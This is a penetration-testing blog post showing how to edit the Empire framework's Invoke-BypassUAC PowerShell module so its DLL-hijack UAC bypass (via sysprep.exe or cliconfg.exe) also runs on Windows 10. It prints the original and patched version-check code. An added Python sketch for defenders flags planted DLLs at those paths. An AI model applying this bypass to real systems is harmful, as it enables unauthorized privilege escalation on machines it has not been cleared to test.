Using Empire in Kali 2.0 to bypass UAC and invoke Mimikatz on Win10

UPDATE:

The guys on the Empire team have since added support for Windows 10, so this is no longer necessary.  🙂

So I was testing out Empire the other day on a Windows 10 box, but kept getting an error message when trying to bypass UAC on Windows 10:

[!] Unsupported OS!

So I took a look at the script that was running under /Empire/data/module_source/privesc/Invoke-BypassUAC.ps1 and found this:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
    # Windows 7/2008
    $szElevDll = 'CRYPTBASE.dll'
    $szElevDir = $env:WINDIR + "\System32\sysprep"
    $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
    $szElevExeFull = "$szElevDir\sysprep.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3")) {
    # Windows 8/2012
    $szElevDll = 'NTWDBLIB.dll'
    $szElevDir = $env:WINDIR + "\System32"
    $szElevDirSysWow64 = ''
    $szElevExeFull = "$szElevDir\cliconfg.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 8/2012 detected"
}
else {
    "[!] Unsupported OS!"
    throw("Unsupported OS!")
}

There it is, that dreaded “Unsupported OS!” error.  It looks like it's doing a version check, but not specifically including Windows 10.  So let's change that:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
    # Windows 7/2008
    $szElevDll = 'CRYPTBASE.dll'
    $szElevDir = $env:WINDIR + "\System32\sysprep"
    $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
    $szElevExeFull = "$szElevDir\sysprep.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") -or ($OSVersion -eq "10.0")) {
    # Windows 8/2012/10
    $szElevDll = 'NTWDBLIB.dll'
    $szElevDir = $env:WINDIR + "\System32"
    $szElevDirSysWow64 = ''
    $szElevExeFull = "$szElevDir\cliconfg.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 8/2012/10 detected"
}
else {
    "[!] Unsupported OS!"
    throw("Unsupported OS!")
}


In the original code on line 555 it was looking specifically for Windows 8 or Server 2012.  In the modified version I added a check for Windows 10 as well.

Success!

After modifying and saving the code, I ran the command again, and this time it worked!
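
For defenders, the two branches above name exact file locations worth watching: a DLL created at either $szElevDllFull path, followed by a launch of the paired $szElevExeFull binary. The sketch below is an added example (not part of the original post or of Empire) that matches those paths in a constructed event list; the event field names and sample values are assumptions, not a real log schema.

```python
import ntpath

# Planted-DLL path -> paired executable, both relative to %WINDIR%, taken from
# the $szElevDllFull / $szElevExeFull values in the script above.
HIJACK_TARGETS = {
    r"system32\sysprep\cryptbase.dll": r"system32\sysprep\sysprep.exe",
    r"system32\ntwdblib.dll": r"system32\cliconfg.exe",
}
# The script's $szElevDirSysWow64 uses "sysnative", an alias 32-bit processes use
# for System32; fold it in case a log source records the path as requested.
ALIASES = {"sysnative": "system32"}

def normalize(path, windir=r"C:\Windows"):
    """Lower-cased path relative to windir with aliases folded, or None if outside."""
    p = ntpath.normpath(path).lower()
    root = ntpath.normpath(windir).lower() + "\\"
    if not p.startswith(root):
        return None
    return "\\".join(ALIASES.get(x, x) for x in p[len(root):].split("\\"))

def find_hijack_writes(events, windir=r"C:\Windows"):
    """Alert on file creations at a planted-DLL path; note if the paired exe ran later."""
    alerts = []
    for i, ev in enumerate(events):
        rel = normalize(ev["path"], windir)
        if ev["type"] != "file_create" or rel not in HIJACK_TARGETS:
            continue
        exe = HIJACK_TARGETS[rel]
        ran = any(e["type"] == "process_create" and normalize(e["path"], windir) == exe
                  for e in events[i + 1:])
        alerts.append({"dll": rel, "writer": ev["image"], "exe_launched_after": ran})
    return alerts

# Constructed sample events in a simplified, hypothetical schema (not a real log format).
SAMPLE_EVENTS = [
    {"type": "file_create", "path": r"C:\WINDOWS\system32\NTWDBLIB.DLL", "image": r"C:\Users\test\demo.exe"},
    {"type": "process_create", "path": r"C:\Windows\System32\cliconfg.exe", "image": r"C:\Users\test\demo.exe"},
    # CRYPTBASE.dll in System32 itself is its normal home and must not alert.
    {"type": "file_create", "path": r"C:\Windows\System32\cryptbase.dll", "image": r"C:\Windows\servicing\TrustedInstaller.exe"},
    {"type": "file_create", "path": r"C:\Windows\sysnative\sysprep\CRYPTBASE.dll", "image": r"C:\Users\test\demo.exe"},
]

if __name__ == "__main__":
    for alert in find_hijack_writes(SAMPLE_EVENTS):
        print(alert)
```

NTWDBLIB.dll may legitimately exist in System32 on hosts with legacy SQL Server client libraries installed, so baseline your fleet before alerting on that path alone.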

Here’s a video of me doing this start to finish.  As always, if you have any questions feel free to drop by #infoseclabs on freenode.